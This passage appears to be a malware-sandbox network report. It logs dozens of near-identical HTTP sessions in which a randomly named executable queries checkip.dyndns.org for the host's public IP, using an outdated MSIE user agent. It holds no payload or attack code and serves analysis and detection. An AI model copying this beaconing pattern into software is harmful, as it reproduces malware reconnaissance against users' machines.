                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        18 | 192.168.2.3 | 49772 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:26.918950081 CEST | 5122 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:27.026371956 CEST | 5122 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        19 | 192.168.2.3 | 49773 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:27.954987049 CEST | 5123 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:28.061099052 CEST | 5123 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        2 | 192.168.2.3 | 49722 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:02:37.180475950 CEST | 4940 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:02:37.285245895 CEST | 4941 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        20 | 192.168.2.3 | 49774 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:29.059497118 CEST | 5124 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:29.167048931 CEST | 5124 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        21 | 192.168.2.3 | 49775 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:29.584446907 CEST | 5125 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2021 11:03:29.689801931 CEST | 5126 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        22 | 192.168.2.3 | 49776 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:29.802161932 CEST | 5126 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:29.908320904 CEST | 5127 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        23 | 192.168.2.3 | 49778 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:30.080657959 CEST | 5131 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:30.185421944 CEST | 5133 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        24 | 192.168.2.3 | 49779 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:30.261841059 CEST | 5134 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:30.367794991 CEST5134INHTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        25 | 192.168.2.3 | 49780 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:30.485392094 CEST | 5135 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:30.592964888 CEST | 5135 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        26 | 192.168.2.3 | 49781 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:30.704296112 CEST | 5136 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:30.812805891 CEST | 5136 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        27 | 192.168.2.3 | 49782 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:30.921722889 CEST | 5137 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.028373957 CEST | 5137 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        28 | 192.168.2.3 | 49784 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:31.139547110 CEST | 5138 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.245043039 CEST | 5138 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        29 | 192.168.2.3 | 49783 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:31.139666080 CEST | 5138 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.245871067 CEST | 5139 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        3 | 192.168.2.3 | 49726 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:03.263449907 CEST | 4965 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:03.370083094 CEST | 4966 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        30 | 192.168.2.3 | 49785 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:31.359153986 CEST | 5139 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.465229988 CEST | 5140 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        31 | 192.168.2.3 | 49787 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:31.574191093 CEST | 5141 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.680071115 CEST | 5142 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        32 | 192.168.2.3 | 49788 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:31.793252945 CEST | 5147 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:31.899229050 CEST | 5149 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        33 | 192.168.2.3 | 49789 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:32.138542891 CEST | 5154 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:32.243829012 CEST | 5154 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        34 | 192.168.2.3 | 49790 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:32.355576038 CEST | 5155 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:32.463823080 CEST | 5155 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        35 | 192.168.2.3 | 49791 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:32.597414017 CEST | 5156 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:32.702333927 CEST | 5156 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        36 | 192.168.2.3 | 49792 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:32.810532093 CEST | 5156 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:32.915160894 CEST | 5157 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        37 | 192.168.2.3 | 49793 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:33.327660084 CEST | 5157 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
